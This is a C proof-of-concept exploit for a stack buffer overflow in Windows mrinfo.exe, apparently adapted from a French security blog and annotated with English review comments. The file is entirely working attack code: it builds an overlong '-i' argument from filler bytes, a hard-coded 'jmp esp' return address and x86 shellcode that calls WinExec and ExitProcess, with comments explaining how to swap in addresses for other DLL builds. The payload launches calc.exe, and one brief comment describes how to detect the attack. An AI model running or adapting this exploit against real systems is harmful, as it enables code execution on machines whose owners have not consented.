#include <windows.h>
#include <stdio.h>


/*
 * Proof-of-concept launcher for a stack buffer overflow in mrinfo.exe.
 *
 * The program builds an over-long "-i" argument for mrinfo.exe and starts
 * it with CreateProcess. The argument is: 56 filler bytes, a 4-byte return
 * address (a "jmp esp" inside ntdll.dll), 4 more filler bytes, then a short
 * x86 stub that calls WinExec and ExitProcess through absolute addresses.
 * All three addresses are hard-coded for one specific DLL build (presumably
 * a Windows XP-era kernel32.dll/ntdll.dll without ASLR — TODO confirm), so
 * the payload only runs on a machine where those DLLs load at exactly those
 * addresses; on any other build the target process simply crashes.
 *
 * Defensive note: the observable artefact is a process creation of
 * mrinfo.exe whose command line carries an abnormally long "-i" argument.
 *
 * Original comments were in French; translated in place.
 */
int main()
{
    // Both structures are zero-initialised. si.cb is never set to
    // sizeof(STARTUPINFO) as the API documents; pi's handles stay NULL if
    // CreateProcess fails, which matters for the unconditional cleanup below.
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    // x86 payload. It contains no NUL byte, so strlen()/strncat() below copy
    // it whole. Decoded from the bytes:
    //   xor ebx,ebx ; push ebx            -> a NUL terminator on the stack
    //   push ".exe" ... push "C:\W"       -> the pushed words spell out a
    //                                        path ending in "calc.exe"
    //   mov edi,<WinExec> ; mov eax,esp ; push 5 ; push eax ; call edi
    //   mov edi,<ExitProcess> ; push ebx ; call edi
    char shellcode[]=
    "\x33\xDB"
    "\x53"
    "\x68\x2E\x65\x78\x65"
    "\x68\x63\x61\x6C\x63"
    "\x68\x6D\x33\x32\x5C"
    "\x68\x79\x73\x74\x65"
    "\x68\x57\x53\x5C\x73"
    "\x68\x49\x4E\x44\x4F"
    "\x68\x43\x3A\x5C\x57"
    "\xBF\x6D\x13\x86\x7C" // Replace 7C86136D with the address of WinExec in your kernel32.dll (absolute, build-specific)
    "\x8B\xC4"
    "\x6A\x05"
    "\x50"
    "\xFF\xD7"
    "\xBF\xDA\xCD\x81\x7C" // Replace 7C81CDDA with the address of ExitProcess in your kernel32.dll (absolute, build-specific)
    "\x53"
    "\xFF\xD7";


    // Return address overwrite: points at a "jmp esp" inside ntdll.dll, so
    // execution lands on the bytes that follow it in the argument (the four
    // 'a' bytes, then the payload). Also build-specific.
    char ret[] = "\xED\x1E\x95\x7C"; // in ntdll.dll, on a jmp esp

    // Command line prefix: the executable path plus the "-i" switch whose
    // argument is the overflowing string. With lpApplicationName == NULL,
    // CreateProcess takes the program to run from this first token.
    char name[] = "C:\\WINDOWS\\system32\\mrinfo.exe -i ";
    // 56 filler bytes + NUL. NOTE(review): malloc result is not checked, and
    // <stdlib.h>/<string.h> are only reached transitively via <windows.h>.
    char* remplissage = (char*) malloc(sizeof(char) * 57);
    remplissage[56] = '\0';
    memset(remplissage,'a',56);

    // Exact size of the assembled command line: every piece that is
    // concatenated below, plus the literal "aaaa" (4) and the terminator (1).
    // The strncat() calls are bounded only by this computation — each one
    // passes the *source* length, so they behave like strcat(). Any change
    // to the pieces must be mirrored here.
    int alloc = ((strlen(name) + strlen(remplissage) + strlen(ret) + strlen(shellcode) + 4 + 1 ));
    // Must be a writable buffer: CreateProcess may modify lpCommandLine.
    char* exploitation = (char*) malloc(sizeof(char)* alloc);

    // Zero-fill so the buffer starts as an empty string for strncat().
    ZeroMemory(exploitation,alloc);

    strncat(exploitation,name,strlen(name));
    strncat(exploitation,remplissage,strlen(remplissage));
    strncat(exploitation,ret,strlen(ret));
    strncat(exploitation,"aaaa",4);   // the 4 bytes "jmp esp" lands on first
    strncat(exploitation,shellcode,strlen(shellcode));


    printf("Exploit MrInfo avec shellcode perso WinExec - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    // NOTE(review): on failure nothing is reported (GetLastError() is never
    // read) and execution falls through to the wait/close calls below with
    // NULL handles; neither malloc'd buffer is ever freed (the process exits
    // right after, so this is a leak only in principle).
    if(CreateProcess(NULL,exploitation,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
    {
        printf("Processus cree.\n");
    }
    // Block until the target process exits (or crashes), then release the
    // process and thread handles returned by CreateProcess.
    WaitForSingleObject(pi.hProcess,INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}